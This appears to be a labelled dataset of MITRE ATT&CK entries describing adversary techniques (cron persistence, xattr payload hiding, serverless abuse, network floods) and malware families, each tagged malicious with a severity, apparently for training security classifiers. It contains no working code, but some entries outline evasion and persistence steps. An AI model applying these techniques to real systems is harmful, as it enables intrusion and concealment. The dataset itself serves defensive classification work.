{"id": "mitre_00434", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Video Capture\n\nTechnique: T1125\nTactics: collection\nPlatforms: Windows, macOS, Linux\n\nAn adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1125", "technique_name": "Video Capture", "tactics": ["collection"]}}]}
{"id": "mitre_00435", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Multi-hop Proxy\n\nTechnique: T1090.003\nTactics: command-and-control\nPlatforms: ESXi, Linux, macOS, Network Devices, Windows\n\nAdversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.\n\nFor example, adversaries may construct or use onion routing networks \u2013 such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network \u2013 to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations.(Citation: ORB Mandiant) \n\nIn the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization\u2019s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport. \n\nSimilarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1090.003", "technique_name": "Multi-hop Proxy", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00436", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Cron\n\nTechnique: T1053.003\nTactics: execution, persistence, privilege-escalation\nPlatforms: Linux, macOS, ESXi\n\nAdversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.\n\nAn adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). In ESXi environments, cron jobs must be created directly via the crontab file (e.g., `/var/spool/cron/crontabs/root`).(Citation: CloudSEK ESXiArgs 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1053.003", "technique_name": "Cron", "tactics": ["execution", "persistence", "privilege-escalation"]}}]}
{"id": "mitre_00437", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# XORIndex Loader\n\nType: malware\nPlatforms: Windows\n\n[XORIndex Loader](https://attack.mitre.org/software/S1248) is a XOR-encoded loader that collects host data, decodes follow-on scripts and acts as a downloader for the [BeaverTail](https://attack.mitre.org/software/S1246) malware. [XORIndex Loader](https://attack.mitre.org/software/S1248) was first reported in June 2025. [XORIndex Loader](https://attack.mitre.org/software/S1248) has been leveraged by North Korea-affiliated threat actors identified as [Contagious Interview](https://attack.mitre.org/groups/G1052). [XORIndex Loader](https://attack.mitre.org/software/S1248) has been delivered to victims through code repository sites utilizing typo squatting naming conventions of various npm packages.(Citation: Socket BeaverTail XORIndex HexEval Contagious Interview July 2025)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "XORIndex Loader", "malware_type": "malware"}}]}
{"id": "mitre_00438", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Squirrelwaffle\n\nType: malware\nPlatforms: Windows\n\n[Squirrelwaffle](https://attack.mitre.org/software/S1030) is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as [Cobalt Strike](https://attack.mitre.org/software/S0154) and the [QakBot](https://attack.mitre.org/software/S0650) banking trojan.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Squirrelwaffle", "malware_type": "malware"}}]}
{"id": "mitre_00439", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SpicyOmelette\n\nType: malware\nPlatforms: Windows\n\n[SpicyOmelette](https://attack.mitre.org/software/S0646) is a JavaScript based remote access tool that has been used by [Cobalt Group](https://attack.mitre.org/groups/G0080) since at least 2018.(Citation: Secureworks GOLD KINGSWOOD September 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SpicyOmelette", "malware_type": "malware"}}]}
{"id": "mitre_00440", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Shared Modules\n\nTechnique: T1129\nTactics: execution\nPlatforms: Linux, macOS, Windows\n\nAdversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).\n\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.\n\nThe Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` files.(Citation: Apple Dev Dynamic Libraries)(Citation: Linux Shared Libraries)(Citation: RotaJakiro 2021 netlab360 analysis)(Citation: Unit42 OceanLotus 2017)\n\nThe Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in `NTDLL.dll` and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like `LoadLibrary` at run time.(Citation: Microsoft DLL)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1129", "technique_name": "Shared Modules", "tactics": ["execution"]}}]}
{"id": "mitre_00441", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# NKAbuse\n\nType: malware\nPlatforms: Linux, macOS, Windows\n\n[NKAbuse](https://attack.mitre.org/software/S1107) is a Go-based, multi-platform malware abusing NKN (New Kind of Network) technology for data exchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor capabilities.(Citation: NKAbuse BC)(Citation: NKAbuse SL)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "NKAbuse", "malware_type": "malware"}}]}
{"id": "mitre_00442", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Launchd\n\nTechnique: T1053.004\nTactics: execution, persistence, privilege-escalation\nPlatforms: macOS\n\nThis technique is deprecated due to the inaccurate usage. The report cited did not provide technical detail as to how the malware interacted directly with launchd rather than going through known services. Other system services are used to interact with launchd rather than launchd being used by itself. \n\nAdversaries may abuse the Launchd daemon to perform task scheduling for initial or recurring execution of malicious code. The launchd daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in /System/Library/LaunchDaemons and /Library/LaunchDaemons (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).\n\nAn adversary may use the launchd daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. launchd can also be abused to run a process under the context of a specified account. Daemons, such as launchd, run with the permissions of the root user account, and will operate regardless of which user account is logged in.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1053.004", "technique_name": "Launchd", "tactics": ["execution", "persistence", "privilege-escalation"]}}]}
{"id": "mitre_00443", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Serverless Execution\n\nTechnique: T1648\nTactics: execution\nPlatforms: SaaS, IaaS, Office Suite\n\nAdversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. \n\nAdversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation: Cado Security Denonia) Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to a serverless cloud function, which may then be able to perform actions the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Rhingo Security Labs GCP Privilege Escalation)\n\nServerless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.(Citation: Backdooring an AWS account) This is also possible in many cloud-based office application suites. For example, in Microsoft 365 environments, an adversary may create a Power Automate workflow that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace environments, they may instead create an Apps Script that exfiltrates a user's data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation: OWN-CERT Google App Script 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1648", "technique_name": "Serverless Execution", "tactics": ["execution"]}}]}
{"id": "mitre_00444", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Pupy\n\nType: tool\nPlatforms: Linux, Windows, macOS, Android\n\n[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy) [Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Pupy", "malware_type": "tool"}}]}
{"id": "mitre_00445", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Commonly Used Port\n\nTechnique: T1043\nTactics: command-and-control\nPlatforms: Linux, macOS, Windows\n\n**This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.**\n\nAdversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as\n\n* TCP:80 (HTTP)\n* TCP:443 (HTTPS)\n* TCP:25 (SMTP)\n* TCP/UDP:53 (DNS)\n\nThey may use the protocol associated with the port or a completely different protocol. \n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are \n\n* TCP/UDP:135 (RPC)\n* TCP/UDP:22 (SSH)\n* TCP/UDP:3389 (RDP)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1043", "technique_name": "Commonly Used Port", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00446", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# USBferry\n\nType: malware\nPlatforms: Windows\n\n[USBferry](https://attack.mitre.org/software/S0452) is an information stealing malware and has been used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://attack.mitre.org/software/S0452) shares an overlapping codebase with [YAHOYAH](https://attack.mitre.org/software/S0388), though it has several features which makes it a distinct piece of malware.(Citation: TrendMicro Tropic Trooper May 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "USBferry", "malware_type": "malware"}}]}
{"id": "mitre_00447", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# AppleScript\n\nTechnique: T1155\nTactics: execution\nPlatforms: macOS\n\nmacOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program.\nAppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. \n\nAdversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\".", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1155", "technique_name": "AppleScript", "tactics": ["execution"]}}]}
{"id": "mitre_00448", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# KOPILUWAK\n\nType: malware\nPlatforms: Windows\n\n[KOPILUWAK](https://attack.mitre.org/software/S1075) is a JavaScript-based reconnaissance tool that has been used for victim profiling and C2 since at least 2017.(Citation: Mandiant Suspected Turla Campaign February 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "KOPILUWAK", "malware_type": "malware"}}]}
{"id": "mitre_00449", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Remote Data Staging\n\nTechnique: T1074.002\nTactics: collection\nPlatforms: Windows, IaaS, Linux, macOS, ESXi\n\nAdversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1074.002", "technique_name": "Remote Data Staging", "tactics": ["collection"]}}]}
{"id": "mitre_00450", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Cloud Account\n\nTechnique: T1136.003\nTactics: persistence\nPlatforms: IaaS, SaaS, Office Suite, Identity Provider\n\nAdversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)\n\nIn addition to user accounts, cloud accounts may be associated with services. Cloud providers handle the concept of service accounts in different ways. In Azure, service accounts include service principals and managed identities, which can be linked to various resources such as OAuth applications, serverless functions, and virtual machines in order to grant those resources permissions to perform various activities in the environment.(Citation: Microsoft Entra ID Service Principals) In GCP, service accounts can also be linked to specific resources, as well as be impersonated by other accounts for [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005).(Citation: GCP Service Accounts) While AWS has no specific concept of service accounts, resources can be directly granted permission to assume roles.(Citation: AWS Instance Profiles)(Citation: AWS Lambda Execution Role)\n\nAdversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.\n\nOnce an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1136.003", "technique_name": "Cloud Account", "tactics": ["persistence"]}}]}
{"id": "mitre_00451", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Hidden Files and Directories\n\nTechnique: T1564.001\nTactics: defense-evasion\nPlatforms: Linux, Windows, macOS\n\nAdversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls \u2013a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.\n\nAdditionally, adversaries may name files in a manner that would allow the file to be hidden such as naming a file only a \u201cspace\u201d character.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1564.001", "technique_name": "Hidden Files and Directories", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00452", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# FoggyWeb\n\nType: malware\nPlatforms: Windows\n\n[FoggyWeb](https://attack.mitre.org/software/S0661) is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least early April 2021.(Citation: MSTIC FoggyWeb September 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "FoggyWeb", "malware_type": "malware"}}]}
{"id": "mitre_00453", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Carbanak\n\nType: malware\nPlatforms: Windows\n\n[Carbanak](https://attack.mitre.org/software/S0030) is a full-featured, remote backdoor used by a group of the same name ([Carbanak](https://attack.mitre.org/groups/G0008)). It is intended for espionage, data exfiltration, and providing remote access to infected machines. (Citation: Kaspersky Carbanak) (Citation: FireEye CARBANAK June 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Carbanak", "malware_type": "malware"}}]}
{"id": "mitre_00454", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Clipboard Data\n\nTechnique: T1115\nTactics: collection\nPlatforms: Linux, macOS, Windows\n\nAdversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nFor example, on Windows adversaries can access clipboard data by using clip.exe or Get-Clipboard.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users\u2019 clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)\n\nmacOS and Linux also have commands, such as pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1115", "technique_name": "Clipboard Data", "tactics": ["collection"]}}]}
{"id": "mitre_00455", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Mosquito\n\nType: malware\nPlatforms: Windows\n\n[Mosquito](https://attack.mitre.org/software/S0256) is a Win32 backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). [Mosquito](https://attack.mitre.org/software/S0256) is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. (Citation: ESET Turla Mosquito Jan 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Mosquito", "malware_type": "malware"}}]}
{"id": "mitre_00456", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Naid\n\nType: malware\nPlatforms: Windows\n\n[Naid](https://attack.mitre.org/software/S0205) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Naid June 2012)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Naid", "malware_type": "malware"}}]}
{"id": "mitre_00457", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Starloader\n\nType: malware\nPlatforms: Windows\n\n[Starloader](https://attack.mitre.org/software/S0188) is a loader component that has been observed loading [Felismus](https://attack.mitre.org/software/S0171) and associated tools. (Citation: Symantec Sowbug Nov 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Starloader", "malware_type": "malware"}}]}
{"id": "mitre_00458", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SoreFang\n\nType: malware\nPlatforms: Windows\n\n[SoreFang](https://attack.mitre.org/software/S0516) is first stage downloader used by [APT29](https://attack.mitre.org/groups/G0016) for exfiltration and to load other malware.(Citation: NCSC APT29 July 2020)(Citation: CISA SoreFang July 2016)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SoreFang", "malware_type": "malware"}}]}
{"id": "mitre_00459", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Create Process with Token\n\nTechnique: T1134.002\nTactics: defense-evasion, privilege-escalation\nPlatforms: Windows\n\nAdversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs)\n\nCreating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process.\n\nWhile this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1134.002", "technique_name": "Create Process with Token", "tactics": ["defense-evasion", "privilege-escalation"]}}]}
{"id": "mitre_00460", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# reGeorg\n\nType: malware\nPlatforms: Network Devices, Windows, macOS, Linux\n\n[reGeorg](https://attack.mitre.org/software/S1187) is an open-source web shell written in Python that can be used as a proxy to bypass firewall rules and tunnel data in and out of targeted networks.(Citation: Fortinet reGeorg MAR 2019)(Citation: GitHub reGeorg 2016)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "reGeorg", "malware_type": "malware"}}]}
{"id": "mitre_00461", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# build_downer\n\nType: malware\nPlatforms: Windows\n\n[build_downer](https://attack.mitre.org/software/S0471) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "build_downer", "malware_type": "malware"}}]}
{"id": "mitre_00462", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# MacSpy\n\nType: malware\nPlatforms: macOS\n\n[MacSpy](https://attack.mitre.org/software/S0282) is a malware-as-a-service offered on the darkweb (Citation: objsee mac malware 2017).", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "MacSpy", "malware_type": "malware"}}]}
{"id": "mitre_00463", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Extended Attributes\n\nTechnique: T1564.014\nTactics: defense-evasion\nPlatforms: Linux, macOS\n\nAdversaries may abuse extended attributes (xattrs) on macOS and Linux to hide their malicious data in order to evade detection. Extended attributes are key-value pairs of file and directory metadata used by both macOS and Linux. They are not visible through standard tools like `Finder`, `ls`, or `cat` and require utilities such as `xattr` (macOS) or `getfattr` (Linux) for inspection. Operating systems and applications use xattrs for tagging, integrity checks, and access control. On Linux, xattrs are organized into namespaces such as `user.` (user permissions), `trusted.` (root permissions), `security.`, and `system.`, each with specific permissions. On macOS, xattrs are flat strings without namespace prefixes, commonly prefixed with `com.apple.*` (e.g., `com.apple.quarantine`, `com.apple.metadata:_kMDItemUserTags`) and used by system features like Gatekeeper and Spotlight.(Citation: Establishing persistence using extended attributes on Linux)\n\nAn adversary may leverage xattrs by embedding a second-stage payload into the extended attribute of a legitimate file. On macOS, a payload can be embedded into a custom attribute using the `xattr` command. A separate loader can retrieve the attribute with `xattr -p`, decode the content, and execute it using a scripting interpreter. On Linux, an adversary may use `setfattr` to write a payload into the `user.` namespace of a legitimate file. A loader script can later extract the payload with `getfattr --only-values`, decode it, and execute it using bash or another interpreter. In both cases, because the primary file content remains unchanged, security tools and integrity checks that do not inspect extended attributes will observe the original file hash, allowing the malicious payload to evade detection.(Citation: Low GroupIB xattrs nov 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1564.014", "technique_name": "Extended Attributes", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00464", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Unsecured Credentials\n\nTechnique: T1552\nTactics: credential-access\nPlatforms: Windows, SaaS, IaaS, Linux, macOS, Containers, Network Devices, Office Suite, Identity Provider\n\nAdversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Shell History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).(Citation: Brining MimiKatz to Unix)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1552", "technique_name": "Unsecured Credentials", "tactics": ["credential-access"]}}]}
{"id": "mitre_00465", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Direct Network Flood\n\nTechnique: T1498.001\nTactics: impact\nPlatforms: Windows, IaaS, Linux, macOS\n\nAdversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n\nBotnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1498.001", "technique_name": "Direct Network Flood", "tactics": ["impact"]}}]}
